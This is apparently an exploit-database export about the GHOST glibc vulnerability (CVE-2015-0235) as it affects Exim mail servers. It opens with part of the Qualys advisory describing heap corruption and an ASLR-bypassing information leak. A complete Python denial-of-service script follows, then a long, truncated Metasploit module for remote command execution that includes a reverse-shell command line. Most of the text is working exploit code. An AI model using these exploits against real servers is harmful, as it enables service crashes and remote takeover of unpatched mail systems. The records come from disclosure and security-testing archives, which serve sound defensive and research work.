malloc hardening. \n \nFirst, we overflow gethostbyname's heap-based buffer and partially \noverwrite the size field of the next contiguous free chunk of memory \nwith a slightly larger size (we overwrite only 3 bytes of the size \nfield; in any case, we cannot overflow more than 4 bytes on 32-bit \nmachines, or 8 bytes on 64-bit machines): \n \n \n|< malloc_chunk \n| \n-----|----------------------|---+--------------------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ... \n-----|----------------------|---+--------------------|----- \n| X| \n|------------------------->| \noverflow \n \nwhere: \n \nstruct malloc_chunk { \n \nINTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ \nINTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ \n \nstruct malloc_chunk* fd; /* double links -- used only if free. */ \nstruct malloc_chunk* bk; \n \n/* Only used for large blocks: pointer to next larger size. */ \nstruct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ \nstruct malloc_chunk* bk_nextsize; \n}; \n \nand: X marks the spot where the crucial memory corruption takes place. \n \n \nAs a result, this artificially-enlarged free chunk, which is managed by \nglibc's malloc, overlaps another block of memory, Exim's current_block, \nwhich is managed by Exim's internal memory allocator: \n \n \n|< malloc_chunk |< storeblock \n| | \n-----|----------------------|------------------------|---------------+---|----- \n... | gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ... \n-----|----------------------|------------------------|---------------+---|----- \n| | \n|<-------------------------------------->| \nartificially enlarged free chunk \n \nwhere: \n \ntypedef struct storeblock { \nstruct storeblock *next; \nsize_t length; \n} storeblock; \n \n \nThen, we partially allocate the enlarged free chunk and overwrite the \nbeginning of Exim's current_block of memory (the \"storeblock\" structure) \nwith arbitrary data. In particular, we overwrite its \"next\" field: \n \n \n|< malloc_chunk |< storeblock \n| | \n-----|----------------------|------------------------|--------+----------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ... \n-----|----------------------|------------------------|--------+----------|----- \n| X | \n|<------------------------------->| \nallocated chunk \n \n \nThis effectively turns gethostbyname's buffer overflow into a \nwrite-anything-anywhere primitive, because we control both the pointer \nto the next block of memory returned by Exim's allocator (the hijacked \n\"next\" pointer) and the data allocated (a null-terminated string, the \nargument of an SMTP command we send to Exim). \n \nFinally, we use this write-anything-anywhere primitive to overwrite \nExim's run-time configuration, which is cached in the heap memory. More \nprecisely, we overwrite Exim's Access Control Lists (ACLs), and achieve \narbitrary command execution thanks to Exim's \"${run{<command> <args>}}\" \nstring expansion mechanism: \n \n|< storeblock \n| \n-----|-------------------------------|---------------|-------------------|----- \n... | Exim's run-time configuration | ... .. .. ... |n|l| current_block | ... \n-----|----x--------------------------|---------------|x------------------|----- \n| | \n'<------------------------------------------' \nhijacked next pointer \n \n \n|< ACLs >| \n-----|----+-----+--------+------+----|---------------|-------------------|----- \n... | Exim's run-time configuration | ... .. .. ... | old current_block | ... \n-----|----+-----+--------+------+----|---------------|-------------------|----- \n| XXXXXXXX | \n|<------------------->| \nnew current_block \n \n \n----[ 5.2 - Information leak ]------------------------------------------------ \n \nThe success of this exploit depends on an important piece of \ninformation: the address of Exim's run-time configuration in the heap. \nIn this section, we describe how we obtain this address, bypassing the \nASLR (Address Space Layout Randomization) and PIE (Position Independent \nExecutable) protections. \n \nFirst, we overflow gethostbyname's heap-based buffer and partially \noverwrite the size field of the next contiguous free chunk of memory \nwith a slightly larger size: \n \n \n|< malloc_chunk \n| \n-----|----------------------|---+-------------------------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ... \n-----|----------------------|---+-------------------------|----- \n| X| \n|------------------------->| \noverflow \n \n \nAs a result, this artificially-enlarged free chunk overlaps another \nblock of memory, where Exim saves the error message \"503 sender not yet \ngiven\\r\\n\" for later use: \n \n \n|< malloc_chunk \n| \n-----|----------------------|-----------------------------|----------+----|----- \n... | gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ... \n-----|----------------------|-----------------------------|----------+----|----- \n| | \n|<-------------------------------------->| \nartificially enlarged free chunk \n \n \nThen, we partially allocate the artificially-enlarged free chunk, \nthereby splitting it in two: the newly allocated chunk, and a smaller, \nfree chunk (the remainder from the split). The malloc_chunk header for \nthis remaining free chunk overwrites the very beginning of the saved \nerror message with a pointer to the heap (the fd_nextsize pointer): \n \n \n|< malloc_chunk |< malloc_chunk \n| | \n-----|----------------------|---------------------+-------|----------+----|----- \n... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ... \n-----|----------------------|---------------------+-------|----------+----|----- \n| | X | \n|<------------------->|<---------------->| \nallocated chunk free chunk \n \n \nFinally, we send an invalid SMTP command to Exim, and retrieve the \nfd_nextsize heap pointer from Exim's SMTP response, which includes the \ncorrupted error message. This effectively turns gethostbyname's buffer \noverflow into an information leak; moreover, it allows us to distinguish \nbetween 32-bit and 64-bit machines. \n \n \n--[ 6 - Acknowledgments ]----------------------------------------------------- \n \nWe would like to thank Alexander Peslyak of the Openwall Project for his \nhelp with the disclosure process of this vulnerability. \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130115/Qualys-CVE-2015-0235.txt"}, {"lastseen": "2016-12-05T22:19:15", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "href": "https://packetstormsecurity.com/files/130171/Exim-ESMTP-GHOST-Denial-Of-Service.html", "id": "PACKETSTORM:130171", "type": "packetstorm", "title": "Exim ESMTP GHOST Denial Of Service", "sourceData": "`The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash. \n \n#!/usr/bin/python \n# Exim ESMTP DoS Exploit by 1N3 v20150128 \n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow \n# http://crowdshield.com \n# \n# USAGE: python ghost-smtp-dos.py <ip> <port> \n# \n# Escape character is '^]'. \n# 220 debian-7-7-64b ESMTP Exim 4.80 ... \n# HELO \n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n# Connection closed by foreign host. \n# \n# user () debian-7-7-64b:~$ dmesg \n# ... \n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in \n# libc-2.13.so[7fabef2a2000+182000] \n \nimport socket \nimport time \nimport sys, getopt \n \ndef main(argv): \nargc = len(argv) \n \nif argc <= 1: \nprint \"usage: %s <host>\" % (argv[0]) \nsys.exit(0) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nbuffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\" \n \ntarget = argv[1] # SET TARGET \nport = argv[2] # SET PORT \n \nprint \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\" \nprint \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer)) \ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nconnect=s.connect((target,int(port))) \ndata = s.recv(1024) \nprint \"CONNECTION: \" +data \ns.send('HELO ' + buffer + '\\r\\n') \ndata = s.recv(1024) \nprint \"received: \" +data \ns.send('EHLO ' + buffer + '\\r\\n') \ndata = s.recv(1024) \nprint \"received: \" +data \ns.close() \n \nmain(sys.argv) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130171/ghost-smtp-dos.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-10T07:05:00", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "id": "1337DAY-ID-23392", "href": "https://0day.today/exploit/description/23392", "type": "zdt", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? (no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n \r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n \r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n \r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n \r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n \r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n \r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n \r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n return check_code\r\n end\r\n \r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n \r\n private\r\n \r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n \r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n \r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n \r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n \r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n \r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n \r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n \r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n \r\n # try different heap_shift values, in case Exim's heap address contains\r\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n \r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n \r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n \r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n \r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n \r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n \r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n \r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n \r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n \r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n \r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n \r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] <=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n \r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n \r\n fail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n \r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n \r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n \r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n \r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n \r\n smtp_connect\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n \r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n \r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n \r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n \r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n \r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue child processes cannot use them.\r\n \r\n fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n \r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n \r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n \r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n \r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n \r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n \r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n \r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n \r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n \r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n \r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n \r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n \r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n \r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n \r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n \r\n (min_heap_addr ? 1 : 2).times do\r\n \r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n \r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n 